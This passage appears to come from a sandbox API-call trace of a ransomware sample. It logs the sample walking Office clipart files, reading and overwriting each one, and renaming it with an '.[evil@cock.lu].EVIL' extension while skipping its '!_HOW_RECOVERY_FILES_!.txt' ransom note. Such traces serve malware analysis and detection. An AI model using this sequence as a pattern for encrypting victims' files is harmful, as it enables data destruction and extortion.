Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF", dwFileAttributes=0x200) returned 0 [0135.569] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.569] wcsstr (_Str="J0105282.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.569] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 69 [0135.569] wcscmp (_String1="J0105282.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.569] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105282.WMF") returned 0x0 [0135.569] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 0x45 [0135.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.571] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12bc, lpOverlapped=0x0) returned 1 [0135.618] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.618] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.618] _errno () returned 0x84b1160840 [0135.618] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.618] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12c0, lpOverlapped=0x0) returned 1 [0135.618] CloseHandle (hObject=0x1a8) returned 1 [0135.619] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.619] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.619] __uncaught_exception () returned 0x84b1160800 [0135.619] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.619] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf.[evil@cock.lu].evil")) returned 1 [0135.620] ??_V@YAXPEAX@Z () returned 0x1 [0135.623] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF", dwFileAttributes=0x200) returned 0 [0135.623] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.623] wcsstr (_Str="J0105286.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.623] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF") returned 69 [0135.623] wcscmp (_String1="J0105286.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.623] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105286.WMF") returned 0x0 [0135.623] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF") returned 0x45 [0135.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.626] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19a8, lpOverlapped=0x0) returned 1 [0135.707] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.707] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.707] _errno () returned 0x84b1160840 [0135.708] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.708] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x19c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19c0, lpOverlapped=0x0) returned 1 [0135.708] CloseHandle (hObject=0x1a8) returned 1 [0135.708] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.708] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.708] __uncaught_exception () returned 0x84b1160800 [0135.708] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.709] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf.[evil@cock.lu].evil")) returned 1 [0135.709] ??_V@YAXPEAX@Z () returned 0x1 [0135.712] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF", dwFileAttributes=0x200) returned 0 [0135.712] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.712] wcsstr (_Str="J0105288.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.712] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 69 [0135.712] wcscmp (_String1="J0105288.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.712] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105288.WMF") returned 0x0 [0135.712] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 0x45 [0135.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.715] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3dd8, lpOverlapped=0x0) returned 1 [0135.784] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.784] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.784] _errno () returned 0x84b1160840 [0135.784] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.785] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3de0, lpOverlapped=0x0) returned 1 [0135.785] CloseHandle (hObject=0x1a8) returned 1 [0135.785] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.785] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.785] __uncaught_exception () returned 0x84b1160800 [0135.785] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.786] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf.[evil@cock.lu].evil")) returned 1 [0135.786] ??_V@YAXPEAX@Z () returned 0x1 [0135.790] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF", dwFileAttributes=0x200) returned 0 [0135.790] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.790] wcsstr (_Str="J0105292.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.790] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 69 [0135.790] wcscmp (_String1="J0105292.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.790] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105292.WMF") returned 0x0 [0135.790] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 0x45 [0135.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.792] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3a14, lpOverlapped=0x0) returned 1 [0135.933] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.933] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.933] _errno () returned 0x84b1160840 [0135.933] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.933] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a20, lpOverlapped=0x0) returned 1 [0135.933] CloseHandle (hObject=0x1a8) returned 1 [0135.933] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.934] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.934] __uncaught_exception () returned 0x84b1160800 [0135.934] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.934] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf.[evil@cock.lu].evil")) returned 1 [0135.935] ??_V@YAXPEAX@Z () returned 0x1 [0135.937] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF", dwFileAttributes=0x200) returned 0 [0135.937] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.938] wcsstr (_Str="J0105294.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.938] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF") returned 69 [0135.938] wcscmp (_String1="J0105294.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.938] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105294.WMF") returned 0x0 [0135.938] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF") returned 0x45 [0135.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.939] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1580, lpOverlapped=0x0) returned 1 [0135.942] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.942] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.942] _errno () returned 0x84b1160840 [0135.942] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.942] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x15a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15a0, lpOverlapped=0x0) returned 1 [0135.943] CloseHandle (hObject=0x1a8) returned 1 [0135.943] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.943] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.943] __uncaught_exception () returned 0x84b1160800 [0135.943] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.943] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf.[evil@cock.lu].evil")) returned 1 [0135.944] ??_V@YAXPEAX@Z () returned 0x1 [0135.947] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF", dwFileAttributes=0x200) returned 0 [0135.947] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.947] wcsstr (_Str="J0105298.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.947] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 69 [0135.947] wcscmp (_String1="J0105298.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.947] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105298.WMF") returned 0x0 [0135.947] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 0x45 [0135.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.949] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18b0, lpOverlapped=0x0) returned 1 [0135.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.953] _errno () returned 0x84b1160840 [0135.953] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.953] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18c0, lpOverlapped=0x0) returned 1 [0135.953] CloseHandle (hObject=0x1a8) returned 1 [0135.953] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.953] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.953] __uncaught_exception () returned 0x84b1160800 [0135.953] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf.[evil@cock.lu].evil")) returned 1 [0135.954] ??_V@YAXPEAX@Z () returned 0x1 [0135.957] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF", dwFileAttributes=0x200) returned 0 [0135.957] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.957] wcsstr (_Str="J0105306.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.957] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 69 [0135.957] wcscmp (_String1="J0105306.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.957] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105306.WMF") returned 0x0 [0135.957] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF") returned 0x45 [0135.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.959] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10e0, lpOverlapped=0x0) returned 1 [0135.987] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.987] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.987] _errno () returned 0x84b1160840 [0135.987] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.987] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1100, lpOverlapped=0x0) returned 1 [0135.987] CloseHandle (hObject=0x1a8) returned 1 [0135.987] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.987] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.987] __uncaught_exception () returned 0x84b1160800 [0135.987] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.988] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf.[evil@cock.lu].evil")) returned 1 [0136.081] ??_V@YAXPEAX@Z () returned 0x1 [0136.084] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF", dwFileAttributes=0x200) returned 0 [0136.084] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0136.084] wcsstr (_Str="J0105320.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0136.084] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 69 [0136.084] wcscmp (_String1="J0105320.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0136.084] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105320.WMF") returned 0x0 [0136.084] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 0x45 [0136.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0136.086] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e4, lpOverlapped=0x0) returned 1 [0136.149] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0136.149] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0136.149] _errno () returned 0x84b1160840 [0136.149] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.149] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x800, lpOverlapped=0x0) returned 1 [0136.149] CloseHandle (hObject=0x1a8) returned 1 [0136.150] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0136.150] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0136.150] __uncaught_exception () returned 0x84b1160800 [0136.150] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0136.150] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf.[evil@cock.lu].evil")) returned 1 [0136.151] ??_V@YAXPEAX@Z () returned 0x1 [0136.155] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF", dwFileAttributes=0x200) returned 0 [0136.155] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0136.155] wcsstr (_Str="J0105328.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0136.155] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 69 [0136.155] wcscmp (_String1="J0105328.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 